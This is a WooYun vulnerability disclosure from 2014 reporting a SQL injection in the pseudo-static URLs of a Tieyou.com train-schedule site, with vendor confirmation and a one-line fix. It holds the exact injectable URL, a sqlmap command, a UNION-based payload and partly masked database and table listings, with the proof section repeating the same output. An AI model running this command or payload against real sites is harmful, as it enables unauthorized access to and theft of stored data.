当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-050909

漏洞标题:铁友网某站SQL注射可致所有数据库信息泄露

相关厂商:铁友网

漏洞作者: lxj616

提交时间:2014-02-14 12:06

修复时间:2014-03-31 12:07

公开时间:2014-03-31 12:07

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-02-14: 细节已通知厂商并且等待厂商处理中
2014-02-14: 厂商已经确认,细节仅向厂商公开
2014-02-24: 细节向核心白帽子及相关领域专家公开
2014-03-06: 细节向普通白帽子公开
2014-03-16: 细节向实习白帽子公开
2014-03-31: 细节向公众公开

简要描述:

铁友网某站SQL注射 可致所有数据库信息泄露
使用SQLMAP跑表足够证明其危害,不继续深入

详细说明:

漏洞位置为

http://checi.tieyou.com/2251/2253/2257.html


由于其对于伪静态的处理存在缺陷,导致在解析uri中间的数字时引发注射
比如:

http://checi.tieyou.com/2251/2253/【注射语句】/2257.html


用SQLMAP 跑表
注:中间的星号是SQLMAP手动标注注射点的记号

C:\Users\Administrator>sqlmap.py -u "http://checi.tieyou.com/2251/2253/*/2257.html" --tables


sqlmap identified the following injection points with a total of 122 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: UNION query
Title: MySQL UNION query (NULL) - 10 columns
Payload: http://checi.tieyou.com:80/2251/2253/' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7179667571,0x69524558475976445374,0x71696d6f71),NULL,NULL,NULL,NULL,NULL,NULL#/2257.html
---
web application technology: Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: UNION query
Title: MySQL UNION query (NULL) - 10 columns
Payload: http://checi.tieyou.com:80/2251/2253/' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7179667571,0x69524558475976445374,0x71696d6f71),NULL,NULL,NULL,NULL,NULL,NULL#/2257.html
---
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5
Database: league
[1 table]
+----------------------------------------------+
| tbl_Franchisee |
+----------------------------------------------+
Database: hotel
[40 tables]
+----------------------------------------------+
|
mask 区域
*****           *****
***** *****
***** *****
***** *****
*****tity *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****l *****
***** *****
***** *****
***** *****
*****etail *****
***** *****
*****price *****
*****y *****
*****y_12 *****
*****ee *****
***** *****
***** *****
*****icelist *****
***** *****
*****foentity *****
***** *****
***** *****
*****rate *****
*****e *****
*****dings *****
*****task *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****og *****
***** *****


+----------------------------------------------+
Database: flight
[5 tables]
+----------------------------------------------+
|

mask 区域
*****           *****
***** *****
***** *****
***** *****
*****u_to_c*****

|
+----------------------------------------------+
Database: log
[6 tables]
+----------------------------------------------+
| log |
|

mask 区域
*****           *****
***** *****
***** *****
***** *****
*****ser_*****

|
+----------------------------------------------+
Database: performance_schema
[17 tables]
+----------------------------------------------+
|

mask 区域
*****           *****
***** *****
***** *****
*****long *****
*****by_instance *****
*****by_thread_by*****
*****global_by_ev*****
***** *****
*****_name *****
*****nce *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****ead*****

|
+----------------------------------------------+
Database: mysql
[24 tables]
+----------------------------------------------+
|

mask 区域
*****           *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****type *****


+----------------------------------------------+
Database: address
[2 tables]
+----------------------------------------------+
| tbl_area |
| tbl_area_new |
+----------------------------------------------+
Database: analysis
[5 tables]
+----------------------------------------------+
|

mask 区域
*****           *****
***** *****
***** *****
***** *****
*****_route*****

|
+----------------------------------------------+
Database: lianmeng
[9 tables]
+----------------------------------------------+
| cronjoblogs |
| lm_admins |
| lm_commissions |
| lm_members |
| lm_orders |
| lm_pic_ads |
| lm_profits |
| lm_tixiansqs |
| lm_users |
+----------------------------------------------+
Database: configdb
[15 tables]
+----------------------------------------------+
|

mask 区域
*****           *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****info*****

|
+----------------------------------------------+
Database: cacheMem
[5 tables]
+----------------------------------------------+
|

mask 区域
*****           *****
***** *****
***** *****
***** *****
*****che*****

4 |
+----------------------------------------------+
Database: clubCtrl
[21 tables]
+----------------------------------------------+
|

mask 区域
*****           *****
***** *****
*****og *****
***** *****
***** *****
*****u *****
*****c *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****_addp*****

|
+----------------------------------------------+
Database: distributor
[6 tables]
+----------------------------------------------+
|

mask 区域
*****           *****
***** *****
*****er *****
*****er_area *****
*****er_dateline *****
*****utor_li*****

|
+----------------------------------------------+
Database: news
[8 tables]
+----------------------------------------------+
|

mask 区域
*****           *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****


+----------------------------------------------+


还有好多数据库,足矣证明其危害,不再继续演示危害

漏洞证明:

用SQLMAP 跑表
注:中间的星号是SQLMAP手动标注注射点的记号

C:\Users\Administrator>sqlmap.py -u "http://checi.tieyou.com/2251/2253/*/2257.html" --tables


sqlmap identified the following injection points with a total of 122 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: UNION query
Title: MySQL UNION query (NULL) - 10 columns
Payload: http://checi.tieyou.com:80/2251/2253/' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7179667571,0x69524558475976445374,0x71696d6f71),NULL,NULL,NULL,NULL,NULL,NULL#/2257.html
---
web application technology: Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: UNION query
Title: MySQL UNION query (NULL) - 10 columns
Payload: http://checi.tieyou.com:80/2251/2253/' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7179667571,0x69524558475976445374,0x71696d6f71),NULL,NULL,NULL,NULL,NULL,NULL#/2257.html
---
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5
Database: league
[1 table]
+----------------------------------------------+
| tbl_Franchisee |
+----------------------------------------------+
Database: hotel
[40 tables]
+----------------------------------------------+
|
mask 区域
*****           *****
***** *****
***** *****
***** *****
*****tity *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****l *****
***** *****
***** *****
***** *****
*****etail *****
***** *****
*****price *****
*****y *****
*****y_12 *****
*****ee *****
***** *****
***** *****
*****icelist *****
***** *****
*****foentity *****
***** *****
***** *****
*****rate *****
*****e *****
*****dings *****
*****task *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****og *****
***** *****


+----------------------------------------------+
Database: flight
[5 tables]
+----------------------------------------------+
|

mask 区域
*****           *****
***** *****
***** *****
***** *****
*****u_to_c*****

|
+----------------------------------------------+
Database: log
[6 tables]
+----------------------------------------------+
| log |
|

mask 区域
*****           *****
***** *****
***** *****
***** *****
*****ser_*****

|
+----------------------------------------------+
Database: performance_schema
[17 tables]
+----------------------------------------------+
|

mask 区域
*****           *****
***** *****
***** *****
*****long *****
*****by_instance *****
*****by_thread_by*****
*****global_by_ev*****
***** *****
*****_name *****
*****nce *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****ead*****

|
+----------------------------------------------+
Database: mysql
[24 tables]
+----------------------------------------------+
|

mask 区域
*****           *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****type *****


+----------------------------------------------+
Database: address
[2 tables]
+----------------------------------------------+
| tbl_area |
| tbl_area_new |
+----------------------------------------------+
Database: analysis
[5 tables]
+----------------------------------------------+
|

mask 区域
*****           *****
***** *****
***** *****
***** *****
*****_route*****

|
+----------------------------------------------+
Database: lianmeng
[9 tables]
+----------------------------------------------+
| cronjoblogs |
| lm_admins |
| lm_commissions |
| lm_members |
| lm_orders |
| lm_pic_ads |
| lm_profits |
| lm_tixiansqs |
| lm_users |
+----------------------------------------------+
Database: configdb
[15 tables]
+----------------------------------------------+
|

mask 区域
*****           *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****info*****

|
+----------------------------------------------+
Database: cacheMem
[5 tables]
+----------------------------------------------+
|

mask 区域
*****           *****
***** *****
***** *****
***** *****
*****che*****

4 |
+----------------------------------------------+
Database: clubCtrl
[21 tables]
+----------------------------------------------+
|

mask 区域
*****           *****
***** *****
*****og *****
***** *****
***** *****
*****u *****
*****c *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****_addp*****

|
+----------------------------------------------+
Database: distributor
[6 tables]
+----------------------------------------------+
|

mask 区域
*****           *****
***** *****
*****er *****
*****er_area *****
*****er_dateline *****
*****utor_li*****

|
+----------------------------------------------+
Database: news
[8 tables]
+----------------------------------------------+
|

mask 区域
*****           *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****


+----------------------------------------------+


还有好多数据库,足矣证明其危害,不再继续演示危害

修复方案:

做好所有uri中的过滤,无论是否使用了伪静态

版权声明:转载请注明来源 lxj616@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-02-14 16:59

厂商回复:

感谢lxj616对携程安全的支持。

最新状态:

暂无